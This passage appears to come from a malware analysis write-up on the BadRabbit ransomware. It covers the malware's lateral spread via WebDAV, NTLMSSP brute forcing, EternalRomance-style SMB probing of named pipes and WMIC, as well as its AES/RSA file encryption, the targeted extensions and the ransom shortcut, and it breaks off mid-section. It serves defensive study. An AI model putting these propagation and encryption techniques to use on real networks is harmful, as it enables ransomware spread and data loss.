<h2 dir="ltr" style="line-height: 1.38; margin-bottom: 6pt; margin-top: 18pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 16pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Proliferation</span></h2>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">BadRabbit (infpub.dat) tries to propagate itself in a local network using the following methods:</span></div>
<ul style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">HTTP WebDAV</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Bruteforcing via NTLMSSP</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Similar to the EternalRomance exploit </span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">WMIC</span></div>
</li>
</ul>
<h3 dir="ltr" style="line-height: 1.38; margin-bottom: 4pt; margin-top: 16pt;">
<span style="background-color: transparent; color: #434343; font-family: "arial"; font-size: 13.999999999999998pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">HTTP WebDAV</span></h3>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="293" src="https://lh6.googleusercontent.com/bq9pKYnugfP5-B1zEg3ze_jZL9Q3ApeyE6iRLdEPZrPytbCTPc-i641cglqPIwPRytg4on14RCpOnwjCWQai-tLbDl4hB98RRoylRaT3gzozIo4cua66LHgU77-xHFIsQhVacRvI" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="602" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="153" src="https://lh6.googleusercontent.com/xKluUPj7HcZ9MBS5BrZC1IqIZQzkX9CdDYsCrOTwGRdK1Vof15wLazHLi7_--it70ipOnpZyMSlF7S0NSTUL4CWpGcc-U_nlpH3fwjtyOzae8YKnWO5tTmmKNFgFeXvUfwuoVu7k" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="593" /></span></div>
<h3 dir="ltr" style="line-height: 1.38; margin-bottom: 4pt; margin-top: 16pt;">
<span style="background-color: transparent; color: #434343; font-family: "arial"; font-size: 13.999999999999998pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Bruteforcing via NTLMSSP </span></h3>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">BadRabbit tries to connect to a remote computer via SMB/NetBios NTLMSSP using the hardcoded list of logins and passwords.</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="95" src="https://lh6.googleusercontent.com/DF4UZK44ICJvF3Etcp6fTH5QmDtLEYIlDGM5cihukdVzvTKHmYMmrukk_FjjrVsxr06xHWG8TigohNE_sz1bQ_owiBXHR3UAnYVYtrGomJZJRpQVyBBraX9qsVJ43YmXAhDfo88F" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="602" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="471" src="https://lh6.googleusercontent.com/ck73IymHcPYu7B91XPWuzj91c-990KOIgXUmTthZZAfPeES5oZCXbretv9RDnxKP1tSQxbK91MQ8FcKhnPvG53ynHhN69zmxD_BxIjnlLc8b1eJONwnUv2XRQTLwilKALu-pV5tt" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="602" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="477" src="https://lh6.googleusercontent.com/cb9hjf_lYKLuFbffMsHgty_n8VuTJd8gJVz3u1etbBtPamIbRANu4bUR31a8WZTIhi79kZw-lUWihTf9qfpyiHDHGe6mFSR3qwp5xM8erbjxeBTyVsmPd5ZjDNH-OLQax2sF8VHs" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="457" /></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<h3 dir="ltr" style="line-height: 1.38; margin-bottom: 4pt; margin-top: 16pt;">
<span style="background-color: transparent; color: #434343; font-family: "arial"; font-size: 13.999999999999998pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">EternalRomance exploit</span></h3>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The Bad Rabbit ransomware is equipped with the EternalRomance exploit. To detect the vulnerability, the Bad Rabbit supposedly uses the Metasploit code for MS17-010 SMB RCE detection. </span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">It connects to the IPC$ tree on hosts in a local network using the default ‘FileID = 0’ during the first run and the following file names:</span></div>
<ul style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">atscvc</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">browser</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">eventlog</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">lsarpc</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">netlogon</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">ntsvcs</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">spoolss</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">samr</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">srvsvc</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">scerpc</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">svcct</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Wkssvc</span></div>
</li>
</ul>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">If the service is not vulnerable, it returns “STATUS_ACCESS_DENIED” or “STATUS_INVALID_HANDLE”. Otherwise, the status will be “STATUS_INSUFF_SERVER_RESOURCES”.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="139" src="https://lh4.googleusercontent.com/tY_Qvc4NBLbRi1a_yY3WcQm-MXYQTJ9wFsxnFTNdgw20CzlmYraBZGZEIhyi8gF-7DWJPC6tuL4fK7PWXPK8jsGHjbkZi4AOqkEAzVq-X4qkC3mnFgiPBn4b3oLmeVvNQJFFDsOl" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="602" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="427" src="https://lh5.googleusercontent.com/8kk8A380k66KtMDl5oE0djXpk-Br6D-aB2ef9561Dn_iFCmasBjvjawTnZlFM7zy8oEdRnU_2_8c4ZRzIyXxMHtAv33wKUdJbtCNnUu4jqcApPWHvXPwdVfg6-DUymeXq2dEgNmT" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="602" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="309" src="https://lh6.googleusercontent.com/wX9si0C0bbrneMbaFlzRUYO3wTGVE0gvbJpIv3CJrRzA11nYRh4lzZ3UqPI4s6O2soMbMP2YclHtIwVPpf5ZYvChgwnnNiSrJsYDhA7VYQaGttL0LD1GqzKYIch-cVlzzHwf_NY3" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="602" /></span></div>
<h3 dir="ltr" style="line-height: 1.38; margin-bottom: 4pt; margin-top: 16pt;">
<span style="background-color: transparent; color: #434343; font-family: "arial"; font-size: 13.999999999999998pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">WMI</span></h3>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">It tries to upload its files to the admin$ share on hosts in a local network using wmic.exe</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="279" src="https://lh6.googleusercontent.com/VM_IPPRaGYUx23LdEyEVIq0ZI2fLvAMPhzsBaiqe9eE8kt5leUMGjy2UWjZ5WbHU25lJM9bW_D-8aREfF-UekN-S8wH9x8ti8OmqDwcavJf2hJ7M-NGVTFOJ5kG_YtLo8uJl_GU5" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="602" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> </span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<h2 dir="ltr" style="line-height: 1.38; margin-bottom: 6pt; margin-top: 18pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 16pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Encryption</span></h2>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The file encryption is done with AES-128-CBC using the Microsoft Cryptographic Provider. The AES key is encrypted using the hardcoded RSA-2048 public key.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<blockquote class="tr_bq" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5clDuVFr5sQxZ</span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">+feQlVvZcEK0k4uCSF5SkOkF9A3tR6O/xAt89/PVhowvu2TfBTRsnBs83</span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">hcFH8hjG2V5F5DxXFoSxpTqVsR4lOm5KB2S8ap4TinG/GN/SVNBFwllpR</span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">hV/vRWNmKgKIdROvkHxyALuJyUuCZlIoaJ5tB0YkATEHEyRsLcntZYsdw</span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">H1P+NmXiNg2MH5lZ9bEOk7YTMfwVKNqtHaX0LJOyAkx4NR0DPOFLDQONW</span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">9OOhZSkRx3V7PC3Q29HHhyiKVCPJsOW1l1mNtwL7KX+7kfNe0CefByEWf</span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">SBt1tbkvjdeP2xBnPjb3GE1GA/oGcGjrXc6wV8WKsfYQIDAQAB</span></blockquote>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The files with the following extensions are encrypted:</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<blockquote class="tr_bq" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">.3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip</span></blockquote>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="background-color: white; line-height: 1.8456; margin-bottom: 11pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The list of folders where BadRabbit does not encrypt files:</span></div>
<ul style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: #444444; font-family: Arial; font-size: 10.5pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: 19pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.8456; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Windows</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: #444444; font-family: Arial; font-size: 10.5pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: 19pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.8456; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Program Files</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: #444444; font-family: Arial; font-size: 10.5pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: 19pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.8456; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">ProgramData</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: #444444; font-family: Arial; font-size: 10.5pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: 19pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.8456; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">AppData</span></div>
</li>
</ul>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The Bad Rabbit ransomware encrypts file and adds wide char “encrypted” text to the very end of the file:</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="277" src="https://lh5.googleusercontent.com/l1qRygD8TCjn-otRnbRVR4YkC0ksSAHL3hkESVbARaX0IjlTSy2uQeU0N5csPhr_G4Gyre-f3clMi0WltZrRjLrHNGdKSAaDfZwneP0wSeZwcqi63EqLlzuF2Z0bjifG0Xo4H2bj" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="602" /></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<b style="font-weight: normal;">The file encryption function:</b><br />
<b style="font-weight: normal;"><br /></b> <b style="font-weight: normal;"><span id="docs-internal-guid-c5aa4db3-5e5b-ec7e-a2ae-23618fadc67c"><span style="font-family: "arial"; font-size: 11pt; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;"><img height="261" src="https://lh4.googleusercontent.com/D4ncIeod6JDW8pzcqAeckyQdvQ2BReRD7GQFRFKQZVEm5e_WRdyFEm42jwAfTBDx9qGVKx46KDEI7xKaXj3ngJOQ-txmu85iDu5OUqGTWPuqbkjQ3tCv8IS8wEUZyyTdNoqoqJyg" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="602" /></span></span></b><br />
<h2 dir="ltr" style="line-height: 1.38; margin-bottom: 6pt; margin-top: 18pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 16pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Decryption Service</span></h2>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The Bad Rabbit creates the ‘DECRYPT.lnk’ file on the Desktop with the execution path to ‘dispci.exe’:</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="400" src="https://lh4.googleusercontent.com/dGWkbLRAno0bXAN6FHJAK8QyeCezI4ISexa1b9jY4ah3WVib4XHiJ6K0J4MJxbInAIP-4CIF8XafNLY1qPPurLXiG1cntBtcY0FfGFNyDyjgdVUwRSUOaGQUIDQar34chyc2x5Fv" style="border: none; transform: rotate(0rad);" width="314" /></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Once executed, it shows the following message:</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="182" src="https://lh6.googleusercontent.com/LyvtO1cKKkKX2qw9EIfkGi7alqidnFoHaueudm58SKAgIJatyC2UW7XB8rhxJ6DZuD_J-diXx1E1HOWoyNb12Cgtt59TwKCH3itXWOnB4iTIOstLYP3BDleZs-9AWhf99CQjqoq-" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="530" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">When the file encryption is completed by the ‘infpub.dat’ module, it shows the installation key#2:</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
